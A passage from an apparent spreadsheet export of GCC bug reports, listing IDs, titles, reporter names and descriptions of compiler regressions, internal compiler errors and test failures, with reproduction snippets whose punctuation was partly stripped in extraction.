based on the zip format which allows an variable-length comment at the end of
the file.) The compilation was successful when I removed the jar file from the
classpath.
Here's a simple test case to summarize: with gcj 4.0.1 the Info-ZIP utility
and any class say HelloWorld.java:
$ jar -cf test.jar gcj -classpath test.jar HelloWorld.java # works fine
$ jar -cf test.jar echo some comment | zip -z test.jar gcj -classpath
test.jar HelloWorld.java
enter new zip file comment (end with .):
jc1: out of memory allocating 1663067502 bytes after a total of 135168 bytes
This problem is similar to bug 13020 for FastJar. I came up with a similar
solution: modifying zextract.c to check for a zipfile comment and if necessary
scan backwards for the end-central-header signature. Unfortunately I haven't had
a chance to test the change compiled into gcc although it appears to work in a
small test program.</t>
  </si>
  <si>
    <t>GCC-30759</t>
  </si>
  <si>
    <t>[4.2 Regression] initializer-list accepted for object of non-POD type</t>
  </si>
  <si>
    <t>Current GCC accepts the following
struct A {
   A(int) { }
}
int main()
{
   A a = { 6 }
}
which is invalid.
This is a regression from GCC-3.3.x</t>
  </si>
  <si>
    <t>GCC-65494</t>
  </si>
  <si>
    <t>[5 Regression] Loop is not vectorized because of operand canonicalization.</t>
  </si>
  <si>
    <t>5.0 compiler is not vectorized simple loop extracted from geekbench but 4.9 compiler does. This is caused by different operand ordering after loop unrolling (I pointed out essential part of tree):
4.9              5.0
_105=_86+_1      _105=_86+_1
_109=_90+_63     _109=_63+_90
_21=_6+_82       _21=_6+_82
Test-case is attached.</t>
  </si>
  <si>
    <t>GCC-68393</t>
  </si>
  <si>
    <t>internal compiler error: in convert_move at expr.c:286</t>
  </si>
  <si>
    <t>I'm seeing an ICE on powerpc64le when building trunk:
x.c:3:9: internal compiler error: in convert_move at expr.c:286
  return __builtin_clzll(x)
         ^~~~~~~~~~~~~~~~~~
0x104a8907 convert_move(rtx_def* rtx_def* int)
	../../gcc/gcc/expr.c:286
0x105c12ab expand_direct_optab_fn
	../../gcc/gcc/internal-fn.c:2114
0x105c1f17 expand_internal_call(internal_fn gcall*)
	../../gcc/gcc/internal-fn.c:2245
0x10348443 expand_call_stmt
	../../gcc/gcc/cfgexpand.c:2565
0x10348443 expand_gimple_stmt_1
	../../gcc/gcc/cfgexpand.c:3525
0x10348443 expand_gimple_stmt
	../../gcc/gcc/cfgexpand.c:3688
0x1034a5df expand_gimple_basic_block
	../../gcc/gcc/cfgexpand.c:5694
0x10351c87 execute
	../../gcc/gcc/cfgexpand.c:6309
A testcase:
unsigned long foo(x)
{
        return __builtin_clzll(x)
}</t>
  </si>
  <si>
    <t>GCC-28594</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on the 4.1 branch
and mainline:
===============================
template struct A
===============================
bug6.cc:1: error: 'void' is not a valid type for a template constant parameter
bug6.cc:1: internal compiler error: tree check: expected tree_list have error_mark in process_template_parm at cp/pt.c:2359
Please submit a full bug report [etc.]
This is fallout from PR 27668.</t>
  </si>
  <si>
    <t>GCC-77822</t>
  </si>
  <si>
    <t>[6 Regression] arm64 Error: immediate value out of range 0 to 63 at operand 3</t>
  </si>
  <si>
    <t>As said mame on arm64 is not building anymore in Debian unstable since the gcc-6 switch.
According to Matthias Klose this seems to be a gcc-6 regression so I'm opening this bug
Debing bug here
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=839249
and attached the preprocessed sources
Compiling src/emu/emumem.cpp...
g++ -g -O2 -fdebug-prefix-map=/Â«PKGBUILDDIRÂ»=. -fPIE -fstack-protector-strong -Wformat -Werror=format-security -g0 -O2 -fdebug-prefix-map=/Â«PKGBUILDDIRÂ»=. -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Wdate-time -D_FORTIFY_SOURCE=2 -MMD -MP -MP -DNDEBUG -DCRLF=2 -DLSB_FIRST -DXMD_H -DFLAC__NO_DLL -DMAME_NOASM -DLUA_COMPAT_ALL -DLUA_COMPAT_5_1 -DLUA_COMPAT_5_2 -DPTR64=1 -DNO_AFFINITY_NP -I../../../../../src/osd -I../../../../../src/emu -I../../../../../src/lib -I../../../../../src/lib/util -I../../../../../3rdparty -I../../../../generated/emu -I../../../../generated/emu/layout -I../../../../../scripts/src   -pipe -Wno-deprecated-declarations -O3 -fno-strict-aliasing -mabi=lp64 -Wno-unknown-pragmas -Wall -Wcast-align -Wundef -Wformat-security -Wwrite-strings -Wno-sign-compare -Wno-conversion -Wno-unused-result -Wno-array-bounds -Wno-cast-align -x c++ -std=c++14 -Woverloaded-virtual -Wsuggest-override -flifetime-dse=1 -include obj/R
 elease/emu.h -o obj/Release/src/emu/emumem.o -c ../../../../../src/emu/emumem.cpp
{standard input}: Assembler messages:
{standard input}:27954: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x26432'
{standard input}:27959: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x29632'
{standard input}:27964: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x212832'
{standard input}:27969: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x216032'
{standard input}:27974: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x219232'
{standard input}:28638: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x26416'
{standard input}:28643: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x28016'
{standard input}:28648: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x29616'
{standard input}:28653: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x211216'
{standard input}:28658: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x212816'
{standard input}:28663: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x214416'
{standard input}:28668: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x216016'
{standard input}:28673: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x217616'
{standard input}:28678: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x219216'
{standard input}:28683: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x220816'
{standard input}:28688: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x222416'
{standard input}:31708: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x26432'
{standard input}:31713: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x29632'
{standard input}:31718: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x212832'
{standard input}:31723: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x216032'
{standard input}:31728: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x219232'
{standard input}:32454: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x26416'
{standard input}:32459: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x28016'
{standard input}:32464: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x29616'
{standard input}:32469: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x211216'
{standard input}:32474: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x212816'
{standard input}:32479: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x214416'
{standard input}:32484: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x216016'
{standard input}:32489: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x217616'
{standard input}:32494: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x219216'
{standard input}:32499: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x220816'
{standard input}:32504: Error: immediate value out of range 0 to 63 at operand 3 -- `ubfx x0x222416'</t>
  </si>
  <si>
    <t>costamagnagianfranco</t>
  </si>
  <si>
    <t>GCC-42696</t>
  </si>
  <si>
    <t>lto1 error with -fsigned-char and char comparison</t>
  </si>
  <si>
    <t>SPEC CPU2006 tests 464.h264ref and 482.sphinx3 fail to build on powerpc64-linux with -m64 -lto -fsigned-char.  For some reason we've added the option -fsigned-char to the SPEC config files for those two tests without it both tests fail at runtime for -m64 but it doesn't affect the results for -m32.  The failure to build with -flto might be due to some problem with -fsigned-char on powerpc64 rather than a problem with LTO.
Here's a minimized testcase:
---------------------
extern char *a
extern int f
void
foo (void)
{
  f = (*a != '-')
} 
---------------------
And here's what happens:
elm3b149% /home/janis/tools/gcc-trunk-anonsvn/bin/gcc -m64 -flto -fsigned-char bug.c -c
elm3b149% /home/janis/tools/gcc-trunk-anonsvn/bin/gcc -m64 -flto -fsigned-char bug.o -shared -o x.so
In function â€˜fooâ€™:
lto1: error: type mismatch in indirect reference
D.1228_2 = *a.0_1
lto1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /home/janis/tools/gcc-trunk-anonsvn/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
If the type of 'a' is signed char then everything works fine.</t>
  </si>
  <si>
    <t>GCC-40196</t>
  </si>
  <si>
    <t>[F03] [F08] Type parameter inquiry (str%len a%kind) and Complex parts (z%re z%im)</t>
  </si>
  <si>
    <t>Type parameter inquiry:
str%len   is equivalent to   len(str)
  a%kind  is equivalent to   kind(a)
The real fun part starts with user-defined kinds e.g.
type tp(dim)
  integer KIND :: dim
  real :: dist(dim)
end type tp
type(tp) :: t(5)
print * t%dist%dim
Quote from F2008 but F2003 should be the same:
A type parameter inquiry is used to inquire about a type parameter of a data object. It applies to both intrinsic and derived types.
R616  type-param-inquiry   is   designator % type-param-name
C622 (R616) The type-param-name shall be the name of a type parameter of the declared type of the object designated by the designator.
A deferred type parameter of a pointer that is not associated or of an unallocated allocatable variable shall not be inquired about.</t>
  </si>
  <si>
    <t>GCC-8624</t>
  </si>
  <si>
    <t>gcc 2.95.3 (arm-linux-gcc) char type problem.</t>
  </si>
  <si>
    <t>A char variable taking a negative value will be cast 
to a positive result when being cast to a int variable.
If it is modified by signed char instead of just char 
at declearation the problem is gone.
Release:
gcc version 2.95.3 20010315 release
Environment:
The problem always occurs when a progrom is cross-compiled 
on x86 linux for arm targets.
How-To-Repeat:
Compile the attached file t.c on a pc with 
 gcc t.c -o t
Run the  ./t the result will be:
  i=-128  j=-128  i=ffffff80  j=ffffff80
 ii=-128 jj=-128 ii=ffffff80 jj=ffffff80
Compile with 
 arm-linux-gcc t.c -o t
Run the  ./t  on an arm platform the result will be:
  i=-128  j=-128   i=ffffff80   j=ffffff80
 ii=128  jj=128   ii=80  jj=80</t>
  </si>
  <si>
    <t>GCC-17820</t>
  </si>
  <si>
    <t>[4.0 Regression] Two kinds of unused warnings</t>
  </si>
  <si>
    <t>static int a = 10
static int b = 20
static int c = 30
gcc -Wall test.c
./xgcc -B ./ -Wall test.c -S
test.c:3: warning: unused variable 'c'
test.c:2: warning: unused variable 'b'
test.c:1: warning: unused variable 'a'
test.c:1: warning: 'a' defined but not used
test.c:2: warning: 'b' defined but not used
test.c:3: warning: 'c' defined but not used
With -xc++ it emits only the latter 3 warnings likewise with gcc 3.4.x.</t>
  </si>
  <si>
    <t>GCC-34342</t>
  </si>
  <si>
    <t>BOZ extensions not diagnosed as such with -std=f95</t>
  </si>
  <si>
    <t>real parameter :: M2_PI = '40490FDB'X
end
uses several extensions which are not diagnosed:
- X instead of Z
- Suffix instead of prefix
- BOZ to initialize a REAL
  (the later is allowed in F2003 using REAL(Z'...').)
BOZ bugs: PR 18026 and PR 29471.
Fortran 95:
   In a DATA statement (5.2.10) an unsigned binary octal or hexadecimal 
   literal constant shall correspond to an integer scalar variable.
   R407 boz-literal-constant is binary-constant
                             or octal-constant
                             or hex-constant
   Constraint: A boz-literal-constant may appear only in a DATA statement.
Fortran 2003:
   A boz-literal-constant shall appear only as a data-stmt-constant
   in a DATA statement as the actual argument associated with the
   dummy argument A of the numeric intrinsic functions DBLE REAL or
   INT or as the actual argument associated with the X or Y dummy
   argument of the intrinsic function CMPLX.
Came up in
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/2ad94287d7f8a6f0/</t>
  </si>
  <si>
    <t>GCC-18555</t>
  </si>
  <si>
    <t>-isysroot is miss-documented</t>
  </si>
  <si>
    <t>Apple needs a command-line switch to the compiler which will change the lookup of include files and 
link libaries. The semantics would be something like:
-isystem-headers-and-libaries 
When this command line option is given to the compiler all of the compiler's builtin searching for 
includes and libaries would start with  instead of with '/'. If a file is included or linked with 
and is not in the hierarchy given by  the compiler will return a file not found error.
All other command line options related to include and link searching particular paths given by -I and 
the like would be unchanged.
This command line search is useful for Apple's compiler where we would like to build for other 
versions of Darwin while running on a stable host. It could also be used in an environment such as a 
distcc farm where the system headers for a target system are in a known location but the binaries on 
the build system will work just fine to build the program.</t>
  </si>
  <si>
    <t>spolk</t>
  </si>
  <si>
    <t>GCC-67315</t>
  </si>
  <si>
    <t>[4.9 Regression] Strange 'this' pointer behavior when calling virtual function with different optimization attributes.</t>
  </si>
  <si>
    <t>Created attachment 36238
preprocessed file of the code in bug
The issue below only get produced on x86 (32 bit) system.
Compiler Version: gcc 4.9.0 (Target: i686-pc-linux-gnu)
System Type:  ubuntu 14.04.02
(Linux dev-virtual-machine 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux)
GCC Compilation Options: 
Configured with: ../gcc-4.9.0/configure --prefix=/home/was/gcc/gcc_install/ --with-gmp=/home/was/gcc/gcc_install/gcc_pre/ --with-mpfr=/home/was/gcc/gcc_install/gcc_pre/ --enable-shared --with-system-zlib --enable-threads=posix --with-mpc='/home/was/gcc/gcc_install/gcc_pre/1~'
Compilation command: 
g++- -ggdb -O3 -Wall -Werror -fstrict-aliasing -Wstrict-aliasing=2 -Wcast-align -fPIC -fno-exceptions -fno-rtti -funsigned-char -DNOTLS -D__STDC_LIMIT_MACROS -D__STDC_FORMAT_MACROS  -o incorrect_this.o test_incorrect_this.cpp
Comiler Output: Clean compilation. No error or warnings.
Description:
When following code is compiled with '-O3' but certain functions in the derived class uses specific function attribute '(__attribute__((optimize(O0))))' to not apply global optimization to those functions then calling the virtual function from within those function causes 'this' pointer to be garbage and is way off than the actual 'this' pointer.
If I compile the whole code with 'O0' the problem goes away. It seems like the compiler is producing incompatible code when the function has optimization level of 'O0' and calling a virtual function that was compiled with O3. 
I have the following code that reproduces the problem with compiler version gcc 4.9.0 4.9.2 and 4.9.3 on x86 systems. Observe 'this' pointer behavior in virtual functions calls. 
Code: 
#include 
class ITest1
{
public:
	virtual void test11(void) = 0
}
class ITest2
{
public:
	virtual void test21(void)
	{
		printf(Calling test21 %p\n this)
	}
}
#define OPTIMIZE_SIZE __attribute__((optimize(O0)))
class Test : public ITest1 public ITest2
{
public:
	Test() : m_test(0)
	{ }
	OPTIMIZE_SIZE void init()
	{
		m_test = 4
		printf(Init %p \n this)
		printf(m_test = %d\n m_test)
		// All following functions have strange 'this' pointer value.
		test11()
		test21()
	}
	void test11(void)
	{
		printf(Calling test11 %p\n this)
		//printf(m_test = %d \n m_test)
	}
	void test12(void)
	{
		printf(Calling test12 %p\n this)
	}
private:
	int m_test
}
int main()
{
	Test *test = new Test()
	test-&gt;init()
}
Output:
root@dev-virtual-machine:/home/dev/framework/test_incorrect_this# ./incorrect_this.o
Init 0x96d9a10
m_test = 4
Calling test11 0xc
Calling test21 0xc
Observe that this pointer has changed to completely different value pointing to garbage. 
Please help me understand the problem and potential fix to avoid this kind of scenario. Thanks.</t>
  </si>
  <si>
    <t>waseemsarwar103</t>
  </si>
  <si>
    <t>GCC-31915</t>
  </si>
  <si>
    <t>Failure with unf_io_convert_3.f90</t>
  </si>
  <si>
    <t>With Dominique's fix so that the test case runs I get failure.
Here is a slightly modified version to illustrate:
! { dg-do run }
! { dg-require-effective-target fortran_large_real }
program main
  integerparameter :: k = selected_real_kind (precision (0.0_8) + 1)
  real(kind=k) abc
  a = 1.1_k
  open(10convert=swapform=unformatted) ! { dg-warning Extension: CONVERT }
  write(10) a
  backspace 10
  read (10) b
  close(10status=delete)
  print * a b
  !if (a /= b) call abort
  write (11) a
  backspace 11
  open (11form=unformatted)
  read (11) c
  print * a c
  if (a .ne. c) call abort
  close (11 status=delete)
end program main
The first test fails miserably.
$ ./a.out
   1.100000000000000000        3.9138956899828401554E-4942
   1.100000000000000000         1.100000000000000000      
I gather that this will not show up on some platforms.</t>
  </si>
  <si>
    <t>GCC-18484</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: g++.dg/abi/empty6.C</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sun Nov 14 05:49:38 UTC 2004 I get:
FAIL: g++.dg/abi/empty6.C  (test for warnings line 6)
With the message in g++.log being:
(none as there are no warnings or errors)
Not known to ever having worked for this target and fails with unspecified
checkouts of 3.3 and 3.4.  At a glance the test assumes a 32-bit target and
seems at fault.</t>
  </si>
  <si>
    <t>GCC-15083</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression]spurious statement has no effect warning</t>
  </si>
  <si>
    <t>When I compile the following program with g++ -Wall (where g++ is the
released 3.4.0) I get the following warning:
quartette$ /net/quartette/carlton/gcc/gcc-3.4.0/install/bin/g++ -Wall test.cpp
test.cpp: In member function `void Foo::resetData()':
test.cpp:31: warning: statement has no effect
The line in question is this one:
        new ( refLoc ) Counter()
but Counter's contructor does have a side effect.  (Indeed the output
of the program changes if you compile out that line.)
Here's the source code I'll attach a .ii file as well.  (The .ii
file is kind of large because I include  to show that
the line in question does indeed change the behavior of the program.)
#include 
#include 
class Counter {
public:
    void decrement() { --ref_ }
    Counter() : ref_(1) {}
    int ref() const {
        return ref_
    }
private:
    int ref_
}
template
class Foo {
  public:
    void resetData() {
        ref_.decrement()
        std::cout &lt;&lt; before:  &lt;&lt; ref_.ref() &lt;&lt; std::endl
        ref_.~Counter()
        void *refLoc = 
        // GCC erroneously claims that the following line has no
        // effect.  But it does have an effect: the value of the
        // after message will be 0 instead of 1 if you comment it
        // out.
        new ( refLoc ) Counter()
        std::cout &lt;&lt; after:  &lt;&lt; ref_.ref() &lt;&lt; std::endl
    }
  private:
    Counter ref_
}
int main() {
    Foo node
    node.resetData()
}</t>
  </si>
  <si>
    <t>GCC-68491</t>
  </si>
  <si>
    <t>libgcc calls __get_cpuid with 0 level breaks on early 486</t>
  </si>
  <si>
    <t>http://nxr.netbsd.org/xref/src/external/gpl3/gcc/dist/libgcc/config/i386/cpuinfo.c#284
calls __get_cpuid with 0 level then we end up in:
http://nxr.netbsd.org/xref/src/external/gpl3/gcc/dist/gcc/config/i386/cpuid.h#263
and end up calling __cpuid even though __get_cpuid_max returns 0. This breaks on early i486 processors that don't have the cpuid instruction and we end up getting SIGILL. Our fix is to explicitly check for 0 to prevent that:
             unsigned int *__ecx unsigned int *__edx)
 {
   unsigned int __ext = __level 
+  unsigned int __maxlevel = __get_cpuid_max (__ext 0)
-  if (__get_cpuid_max (__ext 0) &lt; __level)
+  if (__maxlevel == 0 || __maxlevel &lt; __level)
     return 0
   __cpuid (__level *__eax *__ebx *__ecx *__edx)</t>
  </si>
  <si>
    <t>christos</t>
  </si>
  <si>
    <t>GCC-53551</t>
  </si>
  <si>
    <t>-Wunused-local-typedefs misses uses</t>
  </si>
  <si>
    <t>Hi!
In the following example the context struct provides types to a template class structure.  The provided type is used to define a member variable.  Yet G++ 4.8 claims:
g++-mp-4.8 -std=c++11 -Wall bar.cc
bar.cc: In function 'int main()':
bar.cc:12:21: warning: typedef 'using type = int' locally defined but not used [-Wunused-local-typedefs]
     using type = int
                     ^
This is:
g++-mp-4.8 (MacPorts gcc48 4.8-20120527_1) 4.8.0 20120527 (experimental)
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
The program is:
template 
struct structure
{
  typename C::type val
}
int
main()
{
  struct context
  {
    using type = int
  }
  return structure{42}.val
}
Thanks!</t>
  </si>
  <si>
    <t>GCC-50332</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/attr-invalid.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 178693 gave
FAIL: gcc.dg/attr-invalid.c  (test for warnings line 38)
FAIL: gcc.dg/attr-invalid.c  (test for warnings line 40)
Revision 178686 is OK.</t>
  </si>
  <si>
    <t>GCC-9882</t>
  </si>
  <si>
    <t>Re: ICE in xgcc while building gcc-3.2.1 on ia64-hp-hpux11.22</t>
  </si>
  <si>
    <t xml:space="preserve"> Doug
 I don't believe you can build an HP-UX IA64 GCC from the GCC 3.2.1
 sources.  Not all of the changes we made here at HP in order to make GCC
 work on HP-UX IA64 were checked in in time for the 3.2 or 3.2.1
 releases.  I would recommend trying the GCC 3.3 sources if you want to
 build GCC for ia64-hp-hpux11.22.  GCC 3.3 has not been released yet but
 the sources are avaiable from the FSF CVS tree.  There is also a
 pre-built binary available from http://www.hp.com/go/gcc that should
 work on 11.20 or 11.22.  There are some known header file problems with
 11.22 with this binary that can cause problems depending on what system
 header files you use.
 Steve Ellcey
 sje@cup.hp.com
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-19274</t>
  </si>
  <si>
    <t>temporary not eliminated in composite _mm_set_ps1</t>
  </si>
  <si>
    <t>Sometime the temporary in that composite intrinsic doesn't get eliminated.
Test case: -O3 -march=k8  -fomit-frame-pointer
#include 
__m128 not_eliminated(const float f1 const float f2) {
	const __m128
		a = _mm_set_ps1(f1)
		b = _mm_set_ps1(f2)
		c = _mm_mul_ps(a b)
	return c
}
#define broadcast(f) _mm_shuffle_ps(_mm_load_ss(&amp;(f))_mm_load_ss(&amp;(f))0)
__m128 eliminated(const float f1 const float f2) {
	const __m128
		a = broadcast(f1)
		b = broadcast(f2)
		c = _mm_mul_ps(a b)
	return c
}
int main() { return 0 }
With gcc4-20040102 + patch http://gcc.gnu.org/bugzilla/show_bug.cgi?id=19240
(happens in older version too) i still get:
00401070 :
  401070:       sub    $0x10%esp
  401073:       mov    0x14(%esp)%eax
  401077:       mov    %eax0xc(%esp)
  40107b:       mov    0x18(%esp)%eax
  40107f:       movss  0xc(%esp)%xmm0
  401085:       shufps $0x0%xmm0%xmm0
  401089:       mov    %eax0xc(%esp)
  40108d:       movss  0xc(%esp)%xmm1
  401093:       add    $0x10%esp
  401096:       shufps $0x0%xmm1%xmm1
  40109a:       mulps  %xmm1%xmm0
  40109d:       ret    
and:
004010a0 :
  4010a0:       movss  0x4(%esp)%xmm0
  4010a6:       movss  0x8(%esp)%xmm1
  4010ac:       shufps $0x0%xmm0%xmm0
  4010b0:       shufps $0x0%xmm1%xmm1
  4010b4:       mulps  %xmm1%xmm0
  4010b7:       ret    
It might happens with other intrinsics but i haven't spotted it yet :)</t>
  </si>
  <si>
    <t>GCC-11681</t>
  </si>
  <si>
    <t>g++ crashes gracefully on parse error but fixed in 2.96 redhat</t>
  </si>
  <si>
    <t>g++ crashes on a syntax error.
I narrowed the problem to the following two lines of code (no headers needed). 
This is the result from the .ii file:
    class c_derived : public c_base () {}
    c_derived::c_derived() {}
Command to compile it:
    g++ t.cpp -ggdb
NOTE! without -ggdb this code just is a syntax error and not a crash.
Naturally the syntax error is the () after c2 but g++ does this:
t.cpp:1: parse error before `('
t.cpp:2: invalid use of undefined type `class c1'
t.cpp:1: forward declaration of `class c1'
t.cpp: In method `c1::c1()':
t.cpp:2: Internal compiler error:
t.cpp:2: Internal compiler error in `scope_die_for' at dwarf2out.c:7804
Please submit a full bug report.
See  for instructions.
gcc -v on gcc's that crash on this:
:gcc version 2.95.4 20011002 (Debian prerelease)
:GNU C++ version 2.95.2 20000220 (Debian GNU/Linux) (i386-linux) compiled by GNU
C version 2.95.2 20000220 (Debian GNU/Linux)
:gcc version 2.95.2 20000220 (Debian GNU/Linux)
however this bug is fixed in:
:gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-110)
:gcc version 3.0.4</t>
  </si>
  <si>
    <t>binary1230</t>
  </si>
  <si>
    <t>GCC-59166</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in simplify_subreg at simplify-rtx.c:5901 on valid code (at -O1 and above with -g enabled)</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O1 and above with -g enabled (except -Os in 64-bit mode) on x86_64-linux-gnu.
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --disable-werror --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20131117 (experimental) [trunk revision 204923] (GCC) 
$ 
$ gcc-trunk -O0 -g small.c a.out
$ gcc-trunk -O1 small.c a.out
$ gcc-4.8.2 -O1 -g small.c a.out
$ 
$ gcc-trunk -O1 -g small.c    
small.c: In function â€˜fn1â€™:
small.c:26:1: internal compiler error: in simplify_subreg at simplify-rtx.c:5901
 }
 ^
0x98caf6 simplify_subreg(machine_mode rtx_def* machine_mode unsigned int)
	../../gcc-trunk/gcc/simplify-rtx.c:5900
0x98cc1d simplify_gen_subreg
	../../gcc-trunk/gcc/simplify-rtx.c:6121
0xbf2fba vt_expand_loc_callback
	../../gcc-trunk/gcc/var-tracking.c:8328
0x6a5575 cselib_expand_value_rtx_1
	../../gcc-trunk/gcc/cselib.c:1649
0x6a698e cselib_expand_value_rtx_cb(rtx_def* bitmap_head_def* int rtx_def* (*)(rtx_def* bitmap_head_def* int void*) void*)
	../../gcc-trunk/gcc/cselib.c:1531
0xbf0837 vt_expand_var_loc_chain
	../../gcc-trunk/gcc/var-tracking.c:8223
0xbf32fa vt_expand_loc_callback
	../../gcc-trunk/gcc/var-tracking.c:8385
0x6a565b cselib_expand_value_rtx_1
	../../gcc-trunk/gcc/cselib.c:1684
0x6a698e cselib_expand_value_rtx_cb(rtx_def* bitmap_head_def* int rtx_def* (*)(rtx_def* bitmap_head_def* int void*) void*)
	../../gcc-trunk/gcc/cselib.c:1531
0xbf0837 vt_expand_var_loc_chain
	../../gcc-trunk/gcc/var-tracking.c:8223
0xbf152f vt_expand_1pvar
	../../gcc-trunk/gcc/var-tracking.c:8498
0xbf152f emit_note_insn_var_location(variable_def** emit_note_data_def*)
	../../gcc-trunk/gcc/var-tracking.c:8552
0xbfc35e traverse_noresize
	../../gcc-trunk/gcc/hash-table.h:928
0xbfc35e traverse
	../../gcc-trunk/gcc/hash-table.h:950
0xbfc35e emit_notes_for_changes
	../../gcc-trunk/gcc/var-tracking.c:8914
0xbfd09e emit_notes_in_bb
	../../gcc-trunk/gcc/var-tracking.c:9345
0xbfd09e vt_emit_notes
	../../gcc-trunk/gcc/var-tracking.c:9408
0xbfda4f variable_tracking_main_1
	../../gcc-trunk/gcc/var-tracking.c:10206
0xbfda4f variable_tracking_main()
	../../gcc-trunk/gcc/var-tracking.c:10220
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------
int a b c f g
void
fn2 ()
{
  for ( b b++)
    for ( f f = g)
      for ( a)
}
static int
fn1 (int p)
{
  short d
  if (c)
    {
      for ( f f = g)
      fn2 ()
      d = p
      char e = d
      if (p)
	return 1
    }
  return p
}
int
main ()
{
  fn1 (0)
  fn1 (g)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-81111</t>
  </si>
  <si>
    <t>[8 Regression] Cannot build libstdc++ with -fsanitize=undefined</t>
  </si>
  <si>
    <t>Created attachment 41568
preprocessed source that causes ICE
I tried building libstdc++ using CXXFLAGS=-fsanitize=undefined and it failed building x86_64-pc-linux-gnu/32/libstdc++-v3/src/c++11/cxx11-locale-inst.o and other files for the 32-bit lib.
The same files build OK for 64-bit using -fsanitize=undefined
The attached (unreduced) preprocessed source fails using a recent trunk:
$ /home/jwakely/src/gcc/build/gcc/cc1plus -fsanitize=undefined -m32 cxx11-locale-inst.ii  -quiet
In file included from /home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/bits/stl_algobase.h:63:0
                 from /home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/bits/char_traits.h:39
                 from /home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/string:40
                 from /home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/bits/locale_classes.h:40
                 from /home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/locale:39
                 from /home/jwakely/src/gcc/gcc/libstdc++-v3/src/c++11/locale-inst.cc:38
                 from /home/jwakely/src/gcc/gcc/libstdc++-v3/src/c++11/cxx11-locale-inst.cc:39:
/home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/ext/numeric_traits.h: In instantiation of â€˜const long long unsigned int __gnu_cxx::__numeric_traits_integer::__minâ€™:
/home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/bits/locale_facets.tcc:474:7:   required from â€˜_InIter std::num_get::_M_extract_int(_InIter _InIter std::ios_base _CharT = char _InIter = std::istreambuf_iterator &gt; std::ios_base::iostate = std::_Ios_Iostate]â€™
/home/jwakely/src/gcc/gcc/libstdc++-v3/src/c++11/locale-inst.cc:143:27:   required from here
/home/jwakely/src/gcc/build/x86_64-pc-linux-gnu/32/libstdc++-v3/include/ext/numeric_traits.h:58:67: internal compiler error: Segmentation fault
